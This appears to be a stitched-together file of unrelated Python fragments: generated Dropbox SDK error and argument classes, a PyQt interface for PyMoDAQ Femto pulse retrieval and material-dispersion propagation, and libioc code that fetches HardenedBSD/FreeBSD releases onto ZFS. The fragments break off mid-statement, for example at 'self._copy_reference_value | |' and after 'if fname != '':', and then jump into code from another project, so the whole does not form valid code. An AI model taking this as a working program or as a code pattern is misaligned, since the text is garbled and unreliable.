def path_lookup(cls, val):
"""
Create an instance of this class set to the ``path_lookup`` tag with
value ``val``.
:param LookupError val:
:rtype: RestoreError
"""
return cls('path_lookup', val)
@classmethod
def path_write(cls, val):
"""
Create an instance of this class set to the ``path_write`` tag with
value ``val``.
:param WriteError val:
:rtype: RestoreError
"""
return cls('path_write', val)
def is_path_lookup(self):
"""
Check if the union tag is ``path_lookup``.
:rtype: bool
"""
return self._tag == 'path_lookup'
def is_path_write(self):
"""
Check if the union tag is ``path_write``.
:rtype: bool
"""
return self._tag == 'path_write'
def is_invalid_revision(self):
"""
Check if the union tag is ``invalid_revision``.
:rtype: bool
"""
return self._tag == 'invalid_revision'
def is_other(self):
"""
Check if the union tag is ``other``.
:rtype: bool
"""
return self._tag == 'other'
def get_path_lookup(self):
"""
An error occurs when downloading metadata for the file.
Only call this if :meth:`is_path_lookup` is true.
:rtype: LookupError
"""
if not self.is_path_lookup():
raise AttributeError("tag 'path_lookup' not set")
return self._value
def get_path_write(self):
"""
An error occurs when trying to restore the file to that path.
Only call this if :meth:`is_path_write` is true.
:rtype: WriteError
"""
if not self.is_path_write():
raise AttributeError("tag 'path_write' not set")
return self._value
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RestoreError, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RestoreError(%r, %r)' % (self._tag, self._value)
RestoreError_validator = bv.Union(RestoreError)
class SaveCopyReferenceArg(bb.Struct):
"""
:ivar files.SaveCopyReferenceArg.copy_reference: A copy reference returned
by :meth:`dropbox.dropbox.Dropbox.files_copy_reference_get`.
:ivar files.SaveCopyReferenceArg.path: Path in the user's Dropbox that is
the destination.
"""
__slots__ = [
'_copy_reference_value',
'_copy_reference_present',
'_path_value',
'_path_present',
]
_has_required_fields = True
def __init__(self,
copy_reference=None,
path=None):
self._copy_reference_value | |
data_widget.layout().addWidget(toolbar_data)
data_widget.layout().addWidget(self.data_canvas)
self.ui.dock_retrieved_data.addWidget(data_widget)
##################################################
# setup propagation dock
prop_widget = QtWidgets.QWidget()
prop_widget.setLayout(QtWidgets.QVBoxLayout())
param_widget = QtWidgets.QWidget()
param_widget.setLayout(QtWidgets.QHBoxLayout())
param_widget.setMinimumHeight(300)
self.prop_tree = ParameterTree()
self.pulse_tree = ParameterTree()
param_widget.layout().addWidget(self.prop_tree,1)
param_widget.layout().addWidget(self.pulse_tree, 1)
prop_widget.layout().addWidget(param_widget,1)
propagated_widget = QtWidgets.QWidget()
prop_widget.layout().addWidget(propagated_widget,5)
self.ui.dock_propagation.addWidget(prop_widget)
self.prop_canvas = MplCanvas(propagated_widget, width=5, height=4, dpi=100)
# Create the toolbar, passing the canvas as the first parameter and its parent widget as the second.
toolbar_prop = NavigationToolbar(self.prop_canvas, propagated_widget)
propagated_widget.setLayout(QtWidgets.QVBoxLayout())
propagated_widget.layout().addWidget(toolbar_prop)
propagated_widget.layout().addWidget(self.prop_canvas)
self.prop_tree.setParameters(self.prop_settings, showTop=False)
self.pulse_tree.setParameters(self.pulse_settings, showTop=False)
self.ui.dock_data_in.raiseDock()
def open_simulator(self):
simulator_widget = QtWidgets.QWidget()
self.simulator = Simulator(simulator_widget)
simulator_widget.setWindowTitle('PyMoDAQ Femto Simulator')
simulator_widget.show()
def load_from_simulator(self):
if self.simulator is not None:
data, axis, parameter_axis = self.simulator.trace_exp(Npts=512)
spectrum_axis, spectrum = self.simulator.spectrum_exp(Npts=512)
if self.data_in is None:
self.data_in = DataIn(source='simulated')
self.data_in.update(dict(source='simulated',
raw_spectrum=dict(data=spectrum, x_axis=spectrum_axis),
raw_trace=dict(data=data, x_axis=axis, y_axis=parameter_axis)))
self.display_data_in()
self.update_spectrum_info(self.data_in['raw_spectrum'])
self.update_trace_info(self.data_in['raw_trace'])
for child in putils.iter_children_params(self.settings.child('algo'), childlist=[]):
path = ['algo']
path.extend(self.settings.child('algo').childPath(child))
self.settings.child(*path).setValue(self.simulator.settings.child(*path).value())
self.settings.child('data_in_info', 'loaded_file').setValue('Simulation')
def update_spectrum_info(self, raw_spectrum):
wl0, fwhm = utils.my_moment(raw_spectrum['x_axis']['data'], raw_spectrum['data'])
self.settings.child('data_in_info', 'spectrum_in_info', 'wl0').setValue(wl0 * 1e9)
self.settings.child('data_in_info', 'spectrum_in_info', 'wl_fwhm').setValue(fwhm * 1e9)
self.settings.child('data_in_info', 'spectrum_in_info',
'spectrum_size').setValue(len(raw_spectrum['data']))
self.settings.child('processing', 'grid_settings', 'wl0').setValue(wl0 * 1e9)
self.state.append("spectrum_loaded")
def update_trace_info(self, raw_trace):
wl0, fwhm = utils.my_moment(raw_trace['x_axis']['data'], np.sum(raw_trace['data'], 0))
self.settings.child('data_in_info', 'trace_in_info', 'wl0').setValue(wl0 * 1e9)
self.settings.child('data_in_info', 'trace_in_info', 'wl_fwhm').setValue(fwhm * 1e9)
self.settings.child('data_in_info', 'trace_in_info', 'trace_param_size').setValue(
len(raw_trace['y_axis']['data']))
self.settings.child('data_in_info', 'trace_in_info',
'trace_wl_size').setValue(len(raw_trace['x_axis']['data']))
self.settings.child('processing', 'grid_settings',
'npoints').setValue(next_fast_len(len(raw_trace['x_axis']['data'])))
method = self.settings.child('algo', 'method').value()
if not (method == 'dscan' or method == 'miips'):
self.settings.child('processing', 'grid_settings',
'time_resolution').setValue(np.mean(
np.diff(raw_trace['y_axis']['data'])) * 1e15)
self.state.append("trace_loaded")
def generate_ft_grid(self):
wl0 = self.settings.child('processing', 'grid_settings', 'wl0').value() * 1e-9
Npts = self.settings.child('processing', 'grid_settings', 'npoints').value()
dt = self.settings.child('processing', 'grid_settings', 'time_resolution').value() * 1e-15
self.ft = FourierTransform(Npts, dt, w0=wl2om(-wl0 - 300e-9))
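# Worked example of the grid sizes involved (illustrative numbers only): with
# npoints = 512 and time_resolution = 2 fs, the temporal window is
# 512 * 2 fs ≈ 1.02 ps, and the matching angular-frequency step is
# dw = 2*pi / (Npts * dt) ≈ 6.1e12 rad/s around the centre frequency set by wl0.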
def process_trace(self):
if "trace_loaded" not in self.state:
popup_message("Error", "Please load a trace first!")
return
if "spectrum_processed" not in self.state:
popup_message("Error", "Please process the spectrum first")
return
self.ui.dock_processed.raiseDock()
if self.pnps is None:
logger.info('PNPS is not yet defined, process the spectrum first')
return
trace_in = self.get_trace_in()
# TODO
# ## substract bright spots range (if any)
# if len(self.viewer_trace_in.roi_manager.ROIs) > 0:
# roi = [self.viewer_trace_in.roi_manager.ROIs.keys()][0]
# pos = self.viewer_trace_in.roi_manager.ROIs[roi].pos()
# width, height = self.viewer_trace_in.roi_manager.ROIs[roi].size()
# xlim_pxls = np.array([pos.x(), pos.y()+width])
# ylim_pxls = np.array([pos.x(), pos.y() + height])
# xlim, ylim = self.viewer_trace_in.scale_axis(xlim_pxls, ylim_pxls)
# trace_in = preprocess(trace_in, signal_range=None, bright_signal_range=tuple(xlim))  # bright_signal_range doesn't exist yet
if self.settings.child('processing', 'linearselect', 'dosubstract').value():
xlim = np.array((self.settings.child('processing', 'linearselect', 'wl0').value(),
self.settings.child('processing', 'linearselect', 'wl1').value())) * 1e-9
trace_in = preprocess(trace_in, signal_range=None, dark_signal_range=tuple(xlim))
if self.settings.child('processing', 'ROIselect', 'crop_trace').value():
x0 = self.settings.child('processing', 'ROIselect', 'x0').value()
y0 = self.settings.child('processing', 'ROIselect', 'y0').value()
width = self.settings.child('processing', 'ROIselect', 'width').value()
height = self.settings.child('processing', 'ROIselect', 'height').value()
xlim_pxls = np.array([x0, x0+width])
ylim_pxls = np.array([y0, y0+height])
xlim, ylim = self.viewer_trace_in.scale_axis(xlim_pxls, ylim_pxls)
trace_in = preprocess(trace_in, signal_range=(tuple(ylim), tuple(xlim)))
self.data_in['trace_in'] = trace_in
preprocess2(self.data_in['trace_in'], self.pnps)
self.state.append("trace_processed")
self.trace_canvas.figure.clf()
MeshDataPlot(trace_in, self.trace_canvas.figure, limit=True)
self.trace_canvas.draw()
def process_both(self):
self.process_spectrum()
self.process_trace()
def propagate(self):
if "result_ok" not in self.state:
popup_message("Error", "Complete the retrieval first")
return
self.ui.dock_propagation.raiseDock()
self.propagated_pulse = Pulse(self.result.pnps.ft, self.result.pnps.w0, unit="om")
self.propagated_pulse.spectrum = self.result.pulse_retrieved
material_list = []
material_list.append(self.prop_settings.child('materials', 'material1').value())
material_list.append(self.prop_settings.child('materials', 'material2').value())
thickness_list = []
thickness_list.append(self.prop_settings.child('materials', 'thickness1').value())
thickness_list.append(self.prop_settings.child('materials', 'thickness2').value())
for material, length in zip(material_list, thickness_list):
item = getattr(pymodaq_femto.materials, material)
w1, w2 = sorted(wl2om(np.array(item._range)))
w = self.propagated_pulse.w + self.propagated_pulse.w0
valid = (w >= w1) & (w <= w2)
w = w[valid]
k = item.k(w, unit='om')
k0 = item.k(self.propagated_pulse.w0, unit='om')
k1 = item.k(self.propagated_pulse.w0 + self.propagated_pulse.ft.dw, unit="om")
dk = (k1 - k0) / self.propagated_pulse.ft.dw
# Add material dispersion without the 0th and 1st Taylor orders (they do not reshape the pulse)
kfull = np.zeros_like(self.propagated_pulse.w)
kfull[valid] = (k - k0 - dk * self.propagated_pulse.w[valid])
self.propagated_pulse.spectrum *= np.exp(1j * kfull * 1e-3 * length)
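# Sketch of the phase applied just above: for a slab of length `length` (mm), the
# accumulated spectral phase is
#     phi(w) = [k(w0 + w) - k(w0) - (dk/dw)|_{w0} * w] * length * 1e-3
# i.e. the material phase with its constant and linear (pure group-delay) Taylor
# terms removed, so only GDD and higher orders actually reshape the pulse.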
phasepoly = fit_pulse_phase(self.propagated_pulse, self.prop_settings.child('materials', 'fit_threshold').value(), 4)
self.propagated_pulse.spectrum *= np.exp(- 1j * np.poly1d(phasepoly[-1])(self.propagated_pulse.w))
self.propagated_pulse.spectrum *= np.exp(- 1j * np.poly1d(phasepoly[-2])(self.propagated_pulse.w))
self.pulse_settings.child('pulse_prop', 'gdd').setValue(truncate(phasepoly[-3]*1e30*2,4))
self.pulse_settings.child('pulse_prop', 'tod').setValue(truncate(phasepoly[-4]*1e45*6,4))
self.pulse_settings.child('pulse_prop', 'fod').setValue(truncate(phasepoly[-5]*1e60*24,4))
self.update_fwhm()
plot_oversampling = self.prop_settings.child('materials', 'prop_oversampling').value()
self.prop_canvas.figure.clf()
PulsePropagationPlot(self.propagated_pulse, phasepoly, fwhm = self.pulse_settings.child('pulse_prop', 'fwhm_meas').value(),
fig=self.prop_canvas.figure, oversampling = plot_oversampling,
phase_blanking=True, phase_blanking_threshold=self.prop_settings.child('materials', 'fit_threshold').value())
self.prop_canvas.draw()
def update_fwhm(self):
precision = 1e-15 * self.prop_settings.child('materials', 'dt_fwhm').value()
try:
fwhm = 1e15 * self.propagated_pulse.fwhm(precision)
self.pulse_settings.child('pulse_prop', 'fwhm_meas').setValue(truncate(fwhm,4))
# self.pulse_settings.child('pulse_prop', 'fwhm_ftl').setValue(truncate(1e15 * self.data_in['pulse_in'].fwhm(precision),4))
# ratio_ideal = lib.abs2(self.propagated_pulse.field).max() / lib.abs2(ftl.field).max()
# self.pulse_settings.child('pulse_prop', 'ratio_main_pulse').setValue(truncate(ratio_ideal*100,4))
except ValueError:
warnings.warn("FWHM is undefined.")
self.pulse_settings.child('pulse_prop', 'fwhm_meas').setValue(0)
def process_spectrum(self):
if "spectrum_loaded" not in self.state:
popup_message("Error", "Please load a spectrum first!")
return
self.ui.dock_processed.raiseDock()
self.generate_ft_grid()
method = self.settings.child('algo', 'method').value()
nlprocess = self.settings.child('algo', 'nlprocess').value()
wl0 = self.settings.child('data_in_info', 'trace_in_info', 'wl0').value() * 1e-9
spectrum = self.data_in['raw_spectrum']['data']
wavelength = self.data_in['raw_spectrum']['x_axis']['data']
if 'shg' in nlprocess:
wl0real = 2 * wl0
elif 'thg' in nlprocess:
wl0real = 3 * wl0
else:
wl0real = wl0
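        # The trace central wavelength wl0 refers to the nonlinear signal, so
        # the fundamental pulse grid is centred at twice (SHG) or three times
        # (THG) that wavelength; e.g. an SHG trace centred at 400 nm
        # corresponds to a fundamental pulse at 800 nm.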
self.data_in['pulse_in'] = Pulse(self.ft, wl0real)
for roi in self.viewer_spectrum_in.roi_manager.ROIs:
range = self.viewer_spectrum_in.roi_manager.ROIs[roi].pos()
spectrum = mask(wavelength, spectrum, (range[0] <= wavelength) & (wavelength <= range[1]))
self.data_in['pulse_in'] = pulse_from_spectrum(wavelength, spectrum, pulse=self.data_in['pulse_in'])
#self.pnps = PNPS(self.data_in['pulse_in'], method, nlprocess)
if method == 'dscan':
material = materials[self.settings.child('algo', 'material').value()]
self.pnps = PNPS(self.data_in['pulse_in'], method, nlprocess, material=material)
parameter = utils.linspace_step(self.settings.child('algo', 'dscan_parameter', 'min').value(),
self.settings.child('algo', 'dscan_parameter', 'max').value(),
self.settings.child('algo', 'dscan_parameter', 'step').value())
parameter *= 1e-3
elif method == 'miips':
alpha = self.settings.child('algo', 'alpha').value()
gamma = self.settings.child('algo', 'gamma').value()
self.pnps = PNPS(self.data_in['pulse_in'], method, nlprocess, alpha=alpha, gamma=gamma)
parameter = utils.linspace_step(self.settings.child('algo', 'miips_parameter', 'min').value(),
self.settings.child('algo', 'miips_parameter', 'max').value(),
self.settings.child('algo', 'miips_parameter', 'step').value())
else:
self.pnps = PNPS(self.data_in['pulse_in'], method, nlprocess)
self.state.append("spectrum_processed")
self.pulse_canvas.figure.clf()
PulsePlot(self.data_in['pulse_in'], self.pulse_canvas.figure)
self.pulse_canvas.draw()
def start_retriever(self):
if "trace_processed" not in self.state:
popup_message("Error", "Please process the trace first!")
return
self.ui.dock_retriever.raiseDock()
self.info_widget.clear()
        # make sure any previously running retriever thread is stopped before starting a new one
if self.retriever_thread is not None:
if self.retriever_thread.isRunning():
self.retriever_thread.terminate()
while not self.retriever_thread.isFinished():
QThread.msleep(100)
self.retriever_thread = None
self.retriever_thread = QThread()
retriever = RetrieverWorker(self.data_in, self.pnps, self.settings)
retriever.moveToThread(self.retriever_thread)
retriever.status_sig[str].connect(self.update_retriever_info)
retriever.result_signal[SimpleNamespace].connect(self.display_results)
retriever.callback_sig[list].connect(self.update_retriever)
self.retriever_signal[str].connect(retriever.command_retriever)
self.retriever_thread.retriever = retriever
self.retriever_thread.start()
self.retriever_signal.emit('start')
self.state.append("retrieving")
def stop_retriever(self):
if "retrieving" not in self.state:
popup_message("Error", "No retrieval running")
return
self.retriever_signal.emit('stop')
def update_retriever_info(self, info):
self.info_widget.moveCursor(QTextCursor.End)
self.info_widget.insertPlainText(info+'\n')
self.info_widget.moveCursor(QTextCursor.End)
@pyqtSlot(list)
def update_retriever(self, args):
max = 0.8*np.max([np.abs(np.max(args[0])), np.abs(np.min(args[0]))])
self.viewer_live_trace.ui.histogram_red.setHistogramRange(-max, max)
self.viewer_live_trace.ui.histogram_red.setLevels(-max, max)
self.viewer_live_trace.setImage(args[0])
self.viewer_live_trace.x_axis = utils.Axis(data=args[2], label='Time', units='s')
self.viewer_live_trace.y_axis = utils.Axis(data=args[1], label='Frequency', units='m')
self.data_in['pulse_in'].spectrum = args[3]
#self.data_in['pulse_in'] = substract_linear_phase(self.data_in['pulse_in'])
self.viewer_live_time.show_data([np.abs(self.data_in['pulse_in'].field)**2],
x_axis=utils.Axis(data=self.data_in['pulse_in'].t, label='Time', units='s'),
labels=['Temporal Intensity'])
self.viewer_live_lambda.show_data([np.abs(self.data_in['pulse_in'].spectrum)**2],
x_axis=utils.Axis(data=self.data_in['pulse_in'].wl, label='Wavelength',
units='m'),
labels=['Spectral Intensity'])
@pyqtSlot(SimpleNamespace)
def display_results(self, result):
self.result = result
self.state.append("result_ok")
self.ui.dock_retrieved_data.raiseDock()
self.data_in['pulse_in'].spectrum = result.pulse_retrieved
fundamental = self.data_in['raw_spectrum']['data']
wavelength = self.data_in['raw_spectrum']['x_axis']['data']
#fundamental *= (wavelength * wavelength)
spec = self.data_in['pulse_in'].spectral_intensity
spec = scipy.interpolate.interp1d(self.data_in['pulse_in'].wl, spec,
bounds_error=False,
fill_value=0.0)(wavelength)
fundamental *= lib.best_scale(fundamental, spec)
print("spectrum error", "%e" % lib.nrms(fundamental, spec))
# do the retrieval plot
self.data_canvas.figure.clf()
RetrievalResultPlot(result, fig=self.data_canvas.figure, fundamental=fundamental,
fundamental_wavelength=wavelength,
oversampling=8, phase_blanking=True,
phase_blanking_threshold=0.01, limit=True)
self.data_canvas.draw()
@pyqtSlot(QtCore.QRectF)
def update_ROI(self, rect=QtCore.QRectF(0, 0, 1, 1)):
self.settings.child('processing', 'ROIselect', 'x0').setValue(int(rect.x()))
self.settings.child('processing', 'ROIselect', 'y0').setValue(int(rect.y()))
self.settings.child('processing', 'ROIselect', 'width').setValue(max([1, int(rect.width())]))
self.settings.child('processing', 'ROIselect', 'height').setValue(max([1, int(rect.height())]))
def update_linear(self, linear_roi):
pos = linear_roi.pos()
pos_real, y = self.viewer_trace_in.scale_axis(np.array(pos), np.array([0, 1]))
pos_real *= 1e9
self.settings.child('processing', 'linearselect', 'wl0').setValue(pos_real[0])
self.settings.child('processing', 'linearselect', 'wl1').setValue(pos_real[1])
def show_ROI(self):
# self.settings.child('processing', 'ROIselect').setOpts(
# visible=self.viewer_trace_in.ROIselect_action.isChecked())
data = self.data_in['raw_trace']['data']
axes = [np.arange(0, data.shape[0]), np.arange(0, data.shape[1])]
axes_index = list(range(data.ndim))
marginals = lib.marginals(data)
limits = []
for index in axes_index:
limit = lib.limit(axes[index], marginals[index],
threshold=1e-2, padding=0.25)
limits.append(limit)
self.viewer_trace_in.ui.ROIselect.setPos((limits[1][0], limits[0][0]))
self.viewer_trace_in.ui.ROIselect.setSize((limits[1][1]-limits[1][0], limits[0][1] - limits[0][0]))
self.linear_region.setPos(limits[1])
pos = self.viewer_trace_in.ui.ROIselect.pos()
size = self.viewer_trace_in.ui.ROIselect.size()
self.update_ROI(QtCore.QRectF(pos[0], pos[1], size[0], size[1]))
def get_trace_in(self):
method = self.settings.child('algo', 'method').value()
if method == 'dscan':
label = 'Insertion'
unit = 'm'
elif method == 'miips':
label = 'Phase'
unit = 'rad'
else:
label = 'Delay'
unit = 's'
self.data_in['trace_in'] = MeshData(self.data_in['raw_trace']['data'],
self.data_in['raw_trace']['y_axis']['data'],
self.data_in['raw_trace']['x_axis']['data'],
labels=[label, "wavelength"], units=[unit, "m"])
return self.data_in['trace_in']
def get_pulse_in(self):
self.data_in['pulse_in'] = pulse_from_spectrum(self.data_in['raw_spectrum']['x_axis']['data'],
self.data_in['raw_spectrum']['data'])
def get_axes_from_trace_node(self, fname, node_path):
h5file = self.h5browse.open_file(fname)
data, axes, nav_axes, is_spread = self.h5browse.get_h5_data(node_path)
self.h5browse.close_file()
return axes['x_axis'], axes['nav_00']
def load_last_scan(self):
try:
viewer = self.dashboard.scan_module.ui.scan2D_graph
parameter_axis = utils.Axis(data=viewer.x_axis_scaled.copy(),
label=viewer.scaling_options['scaled_xaxis']['label'],
units=viewer.scaling_options['scaled_xaxis']['units'])
wl = utils.Axis(data=viewer.y_axis_scaled.copy(),
label=viewer.scaling_options['scaled_yaxis']['label'],
units=viewer.scaling_options['scaled_yaxis']['units'])
data = self.dashboard.scan_module.scan_data_2D[0].T.copy()
self.set_data_in_exp(data, wl, parameter_axis)
except Exception as e:
pass
def load_trace_in(self, fname=None, node_path=None):
try:
if fname is not None and node_path is not None:
h5file = self.h5browse.open_file(fname)
data, axes, nav_axes, is_spread = self.h5browse.get_h5_data(node_path)
self.h5browse.close_file()
else:
                data, fname, node_path = browse_data(ret_all=True, message='Select the node corresponding to the '
                                                                           'Characterization Trace')
if fname != '':
self.save_file_pathname = fname
self.settings.child('data_in_info', 'loaded_file').setValue(fname)
self.settings.child('data_in_info', 'loaded_node').setValue(node_path)
wl, parameter_axis = self.get_axes_from_trace_node(fname, node_path)
self.set_data_in_exp(data, wl, parameter_axis, fname, node_path)
except Exception as e:
logger.exception(str(e))
def set_data_in_exp(self, data, wl, parameter_axis, fname='', node_path=''):
if self.data_in is None:
self.data_in = DataIn(source='experimental')
scaling_parameter = self.settings.child('data_in_info',
'trace_in_info', 'param_scaling').value()
scaling_wl = self.settings.child('data_in_info', 'trace_in_info', 'wl_scaling').value()
wl['units'] = 'm'
wl['data'] *= scaling_wl
parameter_axis['data'] *= scaling_parameter
parameter_axis['units'] = 'p.u.'
self.data_in.update(dict(raw_trace={'data': data, 'x_axis': wl, 'y_axis': parameter_axis},
file_path=fname,
node_path=node_path))
self.update_trace_info(self.data_in['raw_trace'])
self.display_trace_in()
self.viewer_trace_in.ROIselect_action.trigger()
def load_spectrum_in(self, fname=None, node_path=None):
if fname is not None and node_path is not None:
h5file = self.h5browse.open_file(fname)
data, axes, nav_axes, is_spread = self.h5browse.get_h5_data(node_path)
self.h5browse.close_file()
else:
            data, fname, node_path = browse_data(ret_all=True, message='Select the node corresponding to the '
                                                                       'Fundamental Spectrum')
if fname != '':
def version_snapshots(self) -> typing.List['libzfs.ZFSSnapshot']:
"""Return the sorted list of taken version snapshots (e.g. p3)."""
versions: typing.List[int] = []
snapshots: typing.Dict[int, 'libzfs.ZFSSnapshot'] = {}
pattern = re.compile(r"^p(\d+)$")
for snapshot in self.root_dataset.snapshots:
match = pattern.match(snapshot.snapshot_name)
if match is None:
continue
patch_level = int(match[1])
versions.append(patch_level)
snapshots[patch_level] = snapshot
return [snapshots[i] for i in reversed(sorted(versions))]
def _require_release_supported(self) -> None:
if self.host.distribution.name == "HardenedBSD":
version = self.release.version_number
if (version == 0) or (version >= 10.4):
return
raise libioc.errors.UnsupportedRelease(
version=version,
logger=self.logger
)
@property
def version_number(self) -> float:
"""Return the numeric release version number or 0 for CURRENT."""
return self._parse_release_version(self.name)
def _parse_release_version(self, release_version_string: str) -> float:
_parts = release_version_string.split("-", maxsplit=1)
parsed_version = _parts[0]
try:
version = float(parsed_version)
if self.host.distribution.name == "HardenedBSD":
if (len(_parts) == 2) and (_parts[1].upper() == "STABLE"):
if (version == 10.0):
return 10.4
elif (version == 11.0):
return 11.1
return version
except ValueError:
return float(0)
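    # Illustrative behaviour of _parse_release_version() (examples, not an
    # exhaustive specification; the HardenedBSD cases depend on
    # host.distribution.name):
    #   "11.2-RELEASE"               -> 11.2
    #   "12.0-CURRENT"               -> 12.0
    #   "CURRENT"                    -> 0.0  (non-numeric prefix)
    #   "10-STABLE" on HardenedBSD   -> 10.4 (mapped above)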
@property
def mirror_url(self) -> str:
"""Return the distributions release mirror URL."""
if self._mirror_url is None:
return str(self.host.distribution.mirror_url)
else:
return self._mirror_url
@mirror_url.setter
def mirror_url(self, value: str) -> None:
"""Override the default release mirror URL."""
url = urllib.parse.urlparse(value)
if url.scheme not in self._supported_url_schemes:
raise ValueError(f"Invalid URL scheme '{url.scheme}'")
self._mirror_url = url.geturl()
@property
def remote_url(self) -> str:
"""Return the releases full mirror URL."""
return f"{self.mirror_url}/{self.real_name}"
@property
def available(self) -> bool:
"""Return True if the release is available on the remote mirror."""
try:
request = urllib.request.Request(self.remote_url, method="HEAD")
resource = urllib.request.urlopen(request) # nosec: trusted URL
return (resource.getcode() == 200) is True # noqa: T484
except urllib.error.URLError:
pass
return False
@property
def fetched(self) -> bool:
"""Return True if the release is fetched locally."""
if self.exists is False:
return False
try:
root_dir_index = os.listdir(self.root_dataset.mountpoint)
except libzfs.ZFSException:
return False
for expected_directory in ["dev", "var", "etc"]:
if expected_directory not in root_dir_index:
return False
return True
@property
def newer_than_host(self) -> bool:
"""Return True if the release is newer than the host."""
host_release_name = self._pad_release_name(self.host.release_version)
release_name = self._pad_release_name(self.name)
host_is_current = host_release_name.startswith("CURRENT")
release_is_current = release_name.startswith("CURRENT")
if release_is_current is True:
if host_is_current is False:
return True
else:
return False
cropped_release_name = release_name[:len(host_release_name)]
return (host_release_name < cropped_release_name)
def _pad_release_name(self, release_name: str, digits: int=4) -> str:
"""Pad releases with 0 until it has 4 characters before the first."""
try:
major_version = int(release_name.split("-")[0].split(".")[0])
padding = str("0" * (digits - len(str(major_version))))
return padding + release_name
except (KeyError, AttributeError, ValueError):
return release_name
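    # Illustrative examples of the padding used by `newer_than_host` above:
    #   _pad_release_name("9.3-RELEASE")  -> "0009.3-RELEASE"
    #   _pad_release_name("11.2-RELEASE") -> "0011.2-RELEASE"
    # so that plain string comparison orders single- and double-digit major
    # versions correctly ("0009..." < "0011...").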
@property
def zfs_pool(self) -> libzfs.ZFSPool:
"""Return the releases ZFS pool."""
try:
root_pool = self.root_dataset.pool # type: libzfs.ZFSPool
return root_pool
except AttributeError:
pool = self.host.datasets.releases.pool # type: libzfs.ZFSPool
return pool
@property
def hashes(self) -> typing.Dict[str, str]:
"""Return the releases asset hashes."""
if self._hashes is None:
if not os.path.isfile(self.__get_hashfile_location()):
self.logger.spam("hashes have not yet been downloaded")
self._fetch_hashes()
self._hashes = self.read_hashes()
if isinstance(self._hashes, dict):
return self._hashes
raise libioc.errors.ReleaseAssetHashesUnavailable(
logger=self.logger
)
@property
def _supported_url_schemes(self) -> typing.List[str]:
return ["https", "http", "ftp"]
@property
def hbds_release_branch(self) -> str:
"""Translate the release into a HardenedBSD release git branch name."""
if self._hbsd_release_branch is not None:
return self._hbsd_release_branch
if self.fetched is False:
raise libioc.errors.ReleaseNotFetched(
name=self.name,
logger=self.logger
)
root_dataset_mountpoint = self.root_dataset.mountpoint
source_file = f"{root_dataset_mountpoint}/etc/hbsd-update.conf"
if not os.path.isfile(source_file):
raise libioc.errors.ReleaseUpdateBranchLookup(
release_name=self.name,
reason=f"{source_file} not found",
logger=self.logger
)
libioc.helpers.require_no_symlink(source_file, logger=self.logger)
with open(source_file, "r", encoding="utf-8") as f:
import ucl
hbsd_update_conf = ucl.load(f.read())
self._hbsd_release_branch = hbsd_update_conf["branch"]
return str(self._hbsd_release_branch)
def fetch(
self,
update: bool=False,
fetch_updates: bool=False,
event_scope: typing.Optional['libioc.events.Scope']=None,
update_base: typing.Optional[bool]=None
) -> typing.Generator['libioc.events.IocEvent', None, None]:
"""
Fetch the release from the remote.
Args:
update (bool): (default=False)
                When enabled, updates are applied to the release,
                unless fetching the updates failed.
fetch_updates (bool): (default=False)
When enabled, updates are fetched.
Disabling this option has no impact on applying updates.
event_scope (libioc.events.Scope): (optional)
Pass on the IocEvent stack for use in higher order functions.
update_base (bool): (optional)
When unset, the sysrc config `ioc_legacy_support` is taken
into account to determine whether ZFS basejail datasets should
be updated in case the release was created or modified.
Those ZFS basejail datasets are required to start basejails
created with iocage_legacy.
A boolean value overrides the configuration from /etc/rc.conf.
"""
release_changed: typing.Optional[bool] = None
self._require_release_supported()
events = libioc.events
fetchReleaseEvent = events.FetchRelease(
self,
scope=event_scope
)
_scope = fetchReleaseEvent.scope
releasePrepareStorageEvent = events.ReleasePrepareStorage(
self,
scope=_scope
)
releaseDownloadEvent = events.ReleaseDownload(
self,
scope=_scope
)
releaseExtractionEvent = events.ReleaseExtraction(
self,
scope=_scope
)
releaseConfigurationEvent = events.ReleaseConfiguration(
self,
scope=_scope
)
releaseCopyBaseEvent = events.ReleaseCopyBase(
self,
scope=_scope
)
if self.fetched is False:
release_changed = False
yield fetchReleaseEvent.begin()
yield releasePrepareStorageEvent.begin()
# ToDo: allow to reach this for forced re-fetch
self.create_resource()
self.get_or_create_dataset("root")
self._ensure_dataset_mounted()
yield releasePrepareStorageEvent.end()
yield releaseDownloadEvent.begin()
try:
yield from self._fetch_assets(releaseDownloadEvent.scope)
except Exception:
yield releaseDownloadEvent.fail()
raise
yield releaseDownloadEvent.end()
yield releaseExtractionEvent.begin()
try:
self._extract_assets()
except Exception as e:
yield releaseExtractionEvent.fail(e)
raise
yield releaseExtractionEvent.end()
release_changed = True
yield fetchReleaseEvent.end()
else:
yield fetchReleaseEvent.skip(
message="already downloaded"
)
self.logger.verbose(
"Release was already downloaded. Skipping download."
)
yield releaseConfigurationEvent.begin()
rc_conf_changed = False
if self._set_default_rc_conf() is True:
rc_conf_changed = True
release_changed = True
if (self._set_default_sysctl_conf() or rc_conf_changed) is True:
release_changed = True
yield releaseConfigurationEvent.end()
else:
yield releaseConfigurationEvent.skip()
self.snapshot("p0")
if fetch_updates is True:
try:
for event in self.updater.fetch(event_scope=_scope):
if isinstance(event, libioc.events.ReleaseUpdateDownload):
if (event.done and event.skipped) is True:
update = False
yield event
except libioc.errors.IocException:
update = False
if update is True:
for event in self.updater.apply():
if isinstance(event, libioc.events.IocEvent):
yield event
else:
# the only non-IocEvent is our return value
release_changed = event
yield releaseCopyBaseEvent.begin()
if update_base is True:
_update_base = True
elif update_base is None:
# if not specified, lookup global host configuration
legacy_support_key = "ioc_legacy_support"
rc_conf = libioc.Config.Host.rc_conf
if legacy_support_key in rc_conf:
_update_base = (rc_conf[legacy_support_key] is True)
else:
_update_base = False
else:
_update_base = False
if _update_base is True:
if release_changed is False:
yield releaseCopyBaseEvent.skip(message="release unchanged")
self.update_base_release()
yield releaseCopyBaseEvent.end()
else:
yield releaseCopyBaseEvent.skip(
message="legacy basejal support disabled"
)
self._cleanup()
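    # A minimal usage sketch of fetch() (illustrative; how the release object
    # is obtained depends on the surrounding libioc setup):
    #
    #   for event in release.fetch(fetch_updates=True, update=True):
    #       print(type(event).__name__, event.done)
    #
    # fetch() is a generator of IocEvent objects; iterating it drives the
    # storage preparation, download, extraction and configuration steps above.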
def _copy_to_base_release(self) -> None:
libioc.helpers.exec(
[
"rsync",
"-a",
"--delete",
f"{self.root_dataset.mountpoint}/",
f"{self.base_dataset.mountpoint}"
],
logger=self.logger
)
@property
def _base_resource(self) -> ReleaseResource:
return ReleaseResource(
release=self.release,
logger=self.logger,
host=self.host,
zfs=self.zfs
)
# ToDo: Memoize ReleaseResource
def snapshot(
self,
